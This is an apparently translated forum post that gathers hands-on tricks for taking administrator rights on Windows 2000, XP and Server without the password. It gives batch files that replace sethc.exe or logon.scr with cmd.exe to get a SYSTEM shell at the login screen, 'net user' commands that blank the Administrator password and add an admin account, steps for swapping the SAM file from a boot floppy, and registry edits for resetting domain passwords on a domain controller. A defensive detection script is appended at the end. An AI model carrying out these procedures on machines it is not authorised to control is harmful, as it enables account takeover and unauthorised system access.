Compilation of tricks for gaining Windows admin rights


Compilation of tricks for gaining Windows XP admin rights
Posted by vuau on 30/12/2007

There are currently many ways to recover a forgotten password for the Administrator account in Windows. Among them: using the tools on a Hiren Boot disc to blank the Administrator account's password, or using password-cracking tools found on the Net. However, we do not always have such a tool at hand. When that happens, take advantage of the weakness in the file sethc.exe on Windows.

Explanation of this trick (for the experts who like to think): On Windows XP, if you press the Shift key 5 times, Windows calls a small program named StickyKeys. This is a program that helps people with disabilities use Windows XP, and it is included by default in Windows' set of utilities. This means you can call this program with a keyboard shortcut, without needing the friendly interface (1). If you are logged in with an account named User1 and press Shift 5 times to call this program, Windows uses User1's privileges to call StickyKeys. If you are not logged in to any account and still manage to call StickyKeys, Windows uses the system's (System) privileges to run StickyKeys (2). From assumptions (1) and (2), if you replace the StickyKeys executable (sethc.exe) with the Command Run program (cmd.exe) and call it with 5 presses of Shift without being logged in to any account, Windows will use System privileges to call cmd.exe instead of sethc.exe. So you can do anything, with the highest account there is (System privileges), from the Command Run program.

Step 1: Log in to Windows with a normal User account, press Shift 5 times to try calling StickyKeys on Windows, and close it again (just to see it).

Step 2: Go to Start >> Run >> type Notepad and press Enter to open Notepad.exe. Copy the code I wrote, paste it into Notepad and save it under the name Hackpass.bat
Code:
    cd %systemroot%\system32
    rename sethc.exe sethc.exe.bk
    copy cmd.exe sethc.exe /y
Then double-click the file Hackpass.bat to run it! This code does the following:
1. Backs up the file sethc.exe by renaming it to sethc.exe.bk
2. Replaces the file sethc.exe with the file cmd.exe
At this point press Shift 5 times; if the Command Run program is called instead of StickyKeys, you have succeeded!

Step 3: Restart the machine. When the login screen appears, do not log in yet; press Shift 5 times instead. The Command Run program now appears; type one of the command lines below.
Blank the Administrator password:
Code:
    net user Administrator ""
-> press Enter when done!
Add an account Admin with the password 123:
Code:
    net user Admin 123 /add
-> press Enter when done!
Put the account Admin into the administrators group:
Code:
    net localgroup Administrators Admin /add
-> press Enter when done!
If you use the command syntax above correctly, you will have created the new accounts. At this point you can log in to the new accounts without restarting the machine!

How to gain Admin rights in Win 2000, 2003, XP

1. How to gain Admin rights in Win2K:
- First you must download the NTFS4DOS software and create a boot disk that can read disks with NTFS partitions.
- After downloading it, install it and create a boot floppy (Note: before you can create a boot floppy that sees NTFS partitions, your floppy must already be formatted and be a boot disk that can boot into DOS; only then can you use NTFS4DOS to make a floppy that can read NTFS partitions from DOS). That completes the step of creating the boot floppy.
- Next, go to the machine on which you want to gain Admin rights, enter its CMOS and set First Boot to: Floppy Drive (if the machine has a CMOS password, you can break the CMOS password with other software; I will skip explaining that part).
- After starting and booting from the floppy, 3 options appear for you to choose from; choose the first one: NTFS4DOS. Then just let it keep running. Next it shows a message asking whether you want to use the NTFS4DOS utility; type yes and press Enter. Then the A:\> prompt appears; switch to the hard-disk partition where Windows is installed (here I take C as the example):
    A:\> C:
    C:\> cd WINNT\SYSTEM32\CONFIG
(the cd command changes to the directory WINNT\SYSTEM32\CONFIG). Continue: at C:\WINNT\SYSTEM32\CONFIG type the command dir
    C:\WINNT\SYSTEM32\CONFIG> dir
We will see a file named: SAM. Continue at the prompt C:\WINNT\SYSTEM32\CONFIG by typing the command
    C:\WINNT\SYSTEM32\CONFIG> ren SAM DUNG
Then try the Dir command again to check whether a file named DUNG exists. If it does, you have succeeded. Note: it is best, before typing ren SAM DUNG to rename the SAM file, to back it up first:
    C:\WINNT\SYSTEM32\CONFIG> md Backup                                   (creates the backup directory)
    C:\WINNT\SYSTEM32\CONFIG> copy SAM C:\WINNT\SYSTEM32\CONFIG\BACKUP    (do this to be safe)
Then restart the machine and that's it; when logging in to the machine you only need to type the User: Administrator, and for the Password you don't need to type anything, just press Enter.

2. How to gain Admin rights in WinXP:
- The method is similar to Win2K, but as you know, if we also rename the SAM file as in Win2K, WinXP will certainly error out and there is no way to get into Windows (the machine will keep restarting).
- So how can we gain Administrator rights now? There is a way and I have tried it successfully; I don't know whether you have guessed it yet; if you already know it, never mind, I'm posting it for those who don't.
- At first I didn't know how to do it either, but later I took a chance and tried the following:
+ I went to another machine with WinXP installed, set the password of the user named Administrator to blank (meaning no password set, the password is empty), restarted the machine, then went into DOS and copied the SAM file of the machine on which I had just made the password of the user Administrator (the one with the highest administrative rights) blank into the BACKUP directory on my floppy.
+ Then I went to the machine with WinXP on which I wanted to gain Admin rights (with the Administrator password I didn't know)
+ and I did exactly the steps above (Note: in WINXP it is not the WINNT directory as in Win2K but the WINDOWS directory): After starting and booting from the floppy, 3 options appear for you to choose from; choose the first one: NTFS4DOS. Then just let it keep running. Next it shows a message asking whether you want to use the NTFS4DOS utility; type yes and press Enter. Then the A:\> prompt appears; switch to the hard-disk partition where Windows is installed (here I take C as the example):
    A:\> C:
    C:\> cd WINDOWS\SYSTEM32\CONFIG
(the cd command changes to the directory WINDOWS\SYSTEM32\CONFIG). Continue: at C:\WINDOWS\SYSTEM32\CONFIG type the command dir
    C:\WINDOWS\SYSTEM32\CONFIG> dir
We will see a file named: SAM. Continue at the prompt C:\WINDOWS\SYSTEM32\CONFIG by typing the command
    C:\WINDOWS\SYSTEM32\CONFIG> ren SAM DUNG
Then try the Dir command again to check whether a file named DUNG exists. If it does, you have succeeded. Note: it is best, before typing ren SAM DUNG to rename the SAM file, to back it up first:
    C:\WINDOWS\SYSTEM32\CONFIG> md Backup                                     (creates the backup directory)
    C:\WINDOWS\SYSTEM32\CONFIG> copy SAM C:\WINDOWS\SYSTEM32\CONFIG\BACKUP    (do this to be safe)
- Next, from C:\WINDOWS\SYSTEM32\CONFIG I typed the command
    C:\WINDOWS\SYSTEM32\CONFIG> A:
to switch to floppy A.
- At A, type
    A:\> cd Backup
to enter the BACKUP directory on A.
- At A:\BACKUP> type dir to check whether the SAM file is in there:
    A:\BACKUP> dir
- From A:\BACKUP type the command:
    A:\BACKUP> copy SAM C:\WINDOWS\SYSTEM32\CONFIG
(Note: before typing the command above you must be sure that the SAM file in C:\WINDOWS\SYSTEM32\CONFIG has been renamed to something else.)
- After typing the command, if the copy succeeded you get a message like: 1 file copied, or something, I don't remember exactly. Then restart the machine and remove the floppy.
- When logging in to the machine, type the user Administrator with an empty password, just press Enter, and okay, now you are the one with the highest administrative rights.

3. How to gain Admin rights in Win 2000 Server used as a Domain Controller:

With this Win2kSrv DC it is a bit more complicated, because on a machine running Win2kSrv DC the Admin password is no longer stored in the SAM file; the SAM file applies only to Local accounts. In Win2kSrv DC, if I remember correctly, it sits in some file with the .DIT extension (if I'm not mistaken). First do the same steps as above: After starting and booting from the floppy or CD, 3 options appear for you to choose from; choose the first one: NTFS4DOS. Then just let it keep running. Next it shows a message asking whether you want to use the NTFS4DOS utility; type yes and press Enter. Then the A:\> prompt appears; switch to the hard-disk partition where Windows is installed (here I take C as the example):
    A:\> C:
    C:\> cd WINNT\SYSTEM32\CONFIG
(the cd command changes to the directory WINNT\SYSTEM32\CONFIG). Continue: at C:\WINNT\SYSTEM32\CONFIG type the command dir
    C:\WINNT\SYSTEM32\CONFIG> dir
We will see a file named: SAM. Continue at the prompt C:\WINNT\SYSTEM32\CONFIG by typing the command
    C:\WINNT\SYSTEM32\CONFIG> ren SAM DUNG
Then try the Dir command again to check whether a file named DUNG exists. If it does, you have succeeded. Note: it is best, before typing ren SAM DUNG to rename the SAM file, to back it up first:
    C:\WINNT\SYSTEM32\CONFIG> md Backup                                   (creates the backup directory)
    C:\WINNT\SYSTEM32\CONFIG> copy SAM C:\WINNT\SYSTEM32\CONFIG\BACKUP    (do this to be safe)
Then Restart the machine; as it starts up again, press F8 repeatedly to enter the selection mode. After pressing F8 there are many options, but to hack it you must choose Directory Service Recovery Mode... Then you get into Safe mode and the machine asks you to press CTRL-ALT-DEL; log in to the machine with the User: Administrator, and of course there is no Password. But don't think that is the end, because however you change the Password, you still cannot log in to the machine in its normal mode, because what you changed is only Local, while the machine uses the DC. So, to gain Admin rights on Win2kSrv DC, continue as follows:
- Go to Start > Run > and type regedit. You get into the Windows Registry Editor; find the following key: HKEY_USERS\.Default\Control Panel\Desktop and adjust the parameters there as follows:
+ SCRNSAVE.EXE, default logon.scr: double-click it and change the value logon.scr to cmd.exe
+ ScreenSaveTimeout, default 900: double-click it and change the value 900 to 10
+ ScreenSaveActive: change it to 1 (if the default is already 1 then forget it, nothing to change)
That's it, now Restart the machine. Let the machine start normally; when you see the dialog asking you to press CTRL-ALT-DEL appear, don't touch it, just wait 10 > 25 s (best not to touch it at all from the moment you restart).
- After waiting 10 > 25 s you will see a command screen appear. In this command window type the command: DSA.MSC and the panel Active Directory Users and Computers appears right there in front of you ). Just click the Users folder on the right, and on the left of the dialog all the users in the Domain appear; your job now is just to change the password of Administrator or any user you want by right-clicking the user whose password you want to change. Choose Set password and type the new password you want (say for Administrator, for instance, because this is the user with supreme rights in the Domain). Then close the Command Prompt window, press CTRL ALT DEL and type, say, the user: Administrator with the password: the new password you just created, and everything is yours. Good luck.

Method 2: This method relies mainly on the net user command, a command prompt command for creating, viewing, deleting and changing the password of an account, with the net user syntax. However, under Windows' permission model only a higher level may handle a lower one, so user accounts have no authority to run this command on an admin account; therefore our problem here is how to run this command in a neutral environment, namely the logon screen. Do the following: Go to Start > Run (or press Windows + R) > type cmd to start the command prompt. Next we type the following commands in turn:
    cd \windows\system32              (change into system32)
    mkdir backup                      (create the backup directory)
    copy logon.scr backup\logon.scr   (copy the file logon.scr into the backup directory)
    copy cmd.exe backup\cmd.exe       (copy the file cmd.exe into the backup directory)
    del logon.scr                     (delete the file logon.scr)
    rename cmd.exe logon.scr          (rename the file cmd.exe to logon.scr)
    exit
Hehe, that's all there is to it; we just restart Windows, and at the logon screen sit and wait a few minutes until the screen saver appears, which has now turned into a command prompt window where you can use the net user command above.
/////////////////// In my opinion you run a mini Windows, and in DOS > system32 > type the commands:
    ren sethc.exe <file name>
    copy cmd.exe sethc.exe

///////////////////// Hello everyone, today I found an article I thought was interesting, so I'm posting it for everyone to look at: "hack password window". If you have read documentation about Windows, you probably know that Microsoft wrote the operating system not only for healthy people like us but also for people with disabilities, namely the "Accessibility Options" feature in Control Panel. Exploiting this feature, hackers get into the system easily without the user's password. Here I explain how to do it: By default, at the logon screen, when we press SHIFT 5 times Windows calls the file sethc.exe to run the StickyKeys program. Now we will replace this file with cmd.exe to run the command program. We proceed as follows: First we must get into DOS (using an external DOS boot disk, usually Hiren Boot). Once in DOS, type the command
    cd C:\windows\system32
and press Enter (this command changes to the directory containing the file sethc.exe). Next type the command
    rename sethc.exe sethc.bat
and press Enter (this command renames the file sethc.exe to sethc.bat; note: we can rename sethc.exe to any file, as long as it is easy to remember so we can restore it later). Then type the command
    copy cmd.exe sethc.exe /y
(this command replaces the file sethc.exe with cmd.exe). At this point we are 50% successful. Restart the machine, and at the login screen press SHIFT 5 times to call cmd. Now there are commands for us to choose from: if you want to clear the Admin password, type the command
    net user administrator ""
and press Enter; if you want to create a new user, type the command
    net user tenuser pass /add
and press Enter (tenuser is whatever you like, e.g. admin..., pass can be given or left blank), but this is only an ordinary user; if we want to hold full control of this machine, type the command

    net localgroup administrators tenuser /add
and press Enter. Now we can use the computer with the highest administrative rights.
P/S: I found it interesting so I'm posting it for you to look at; I haven't tried it myself yet. I invite the home tinkerers to show their skills, hehe. Wish you success and luck in life, and wonderful moments at our iSpace forum!! Regards.
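Added here as an example (it is not code from any of the posts above and not a Microsoft tool): a Python audit that looks for the traces the procedures above leave behind, namely sethc.exe or logon.scr byte-identical to cmd.exe, a renamed original such as sethc.exe.bk or a `backup` folder next to it, and the HKEY_USERS\.DEFAULT\Control Panel\Desktop values set the way the Win2kSrv DC method sets them. The file names are the real System32 names; the System32 path argument, the constructed sample directory used for an offline dry run, and the extra helper names (utilman.exe, osk.exe, narrator.exe, magnify.exe, powershell.exe) are my additions. It runs against a live system or a mounted offline image.

```python
"""Audit a System32 directory and the logon-screen registry values for the
binary-swap tricks above.  Added example, not code from the posts."""
import hashlib
import os
import sys
import tempfile

# Binaries Windows starts from the logon screen, i.e. as SYSTEM.  sethc.exe and
# logon.scr are the ones swapped in the posts; the rest are the same trick
# applied to the other accessibility helpers (assumption: same swap pattern).
LOGON_LAUNCHED = ["sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                  "magnify.exe", "logon.scr"]
SHELLS = ["cmd.exe", "powershell.exe"]        # what gets copied over them
LOGON_DESKTOP_KEY = r".DEFAULT\Control Panel\Desktop"   # under HKEY_USERS


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_swapped_binaries(system32):
    """Map each logon-launched binary whose bytes equal a shell in the same
    directory to that shell.  'copy cmd.exe sethc.exe /y' leaves the two files
    identical, so an equal hash is the signal."""
    shells = {}
    for name in SHELLS:
        path = os.path.join(system32, name)
        if os.path.isfile(path):
            shells[sha256_of(path)] = name
    swapped = {}
    for name in LOGON_LAUNCHED:
        path = os.path.join(system32, name)
        if os.path.isfile(path):
            digest = sha256_of(path)
            if digest in shells:
                swapped[name] = shells[digest]
    return swapped


def find_backup_leftovers(system32):
    """The procedures park the genuine file as sethc.exe.bk / sethc.bat or in a
    'backup' subfolder; such traces next to a swapped binary corroborate it."""
    stems = {n.split(".")[0].lower() for n in LOGON_LAUNCHED}
    expected = {n.lower() for n in LOGON_LAUNCHED}
    hits = []
    for entry in sorted(os.listdir(system32)):
        low = entry.lower()
        if low in expected:
            continue
        if low.split(".")[0] in stems:
            hits.append(entry)
        elif low == "backup" and os.path.isdir(os.path.join(system32, entry)):
            hits.append(entry + os.sep)
    return hits


def check_logon_screensaver(values):
    """values: the HKEY_USERS\\.DEFAULT\\Control Panel\\Desktop values as a dict.
    The DC method sets SCRNSAVE.EXE=cmd.exe and ScreenSaveTimeout=10 so a
    SYSTEM shell pops at the logon screen by itself; flag both conditions."""
    findings = []
    scr = str(values.get("SCRNSAVE.EXE", "")).strip().lower()
    if scr and not scr.endswith(".scr"):
        findings.append("SCRNSAVE.EXE is %r, not a screen saver" % values["SCRNSAVE.EXE"])
    try:
        timeout = int(values.get("ScreenSaveTimeout", 900))
    except ValueError:
        timeout = 900
    if str(values.get("ScreenSaveActive", "0")) == "1" and timeout < 60:
        findings.append("logon screen saver fires after %d s" % timeout)
    return findings


def read_logon_screensaver_values():
    """Live read of the key on Windows; {} elsewhere or if the key is missing."""
    try:
        import winreg
    except ImportError:
        return {}
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_USERS, LOGON_DESKTOP_KEY) as key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:
                    break
                values[name] = data
                index += 1
    except OSError:
        pass
    return values


def make_sample_system32():
    """Constructed sample directory (not a real System32) reproducing the state
    the sethc.exe and logon.scr swaps above leave behind."""
    d = tempfile.mkdtemp(prefix="fake_system32_")
    files = {"cmd.exe": b"MZ cmd", "sethc.exe": b"MZ cmd", "logon.scr": b"MZ cmd",
             "utilman.exe": b"MZ utilman", "sethc.exe.bk": b"MZ sethc"}
    for name, data in files.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    return d


if __name__ == "__main__":
    s32 = sys.argv[1] if len(sys.argv) > 1 else os.path.join(
        os.environ.get("SystemRoot", r"C:\Windows"), "System32")
    for helper, shell in find_swapped_binaries(s32).items():
        print("SWAPPED  %s is a byte-identical copy of %s" % (helper, shell))
    for trace in find_backup_leftovers(s32):
        print("LEFTOVER %s" % trace)
    for finding in check_logon_screensaver(read_logon_screensaver_values()):
        print("REGISTRY %s" % finding)
```

Run it as `python audit.py` on the live machine, or `python audit.py E:\WINDOWS\system32` against a mounted image of the disk, which is how you would check a box after a rescue-disc session like the ones above. Hash equality only catches a straight copy of cmd.exe; a swapped-in binary that is not one of the listed shells would still need to be compared against a known-good copy from installation media.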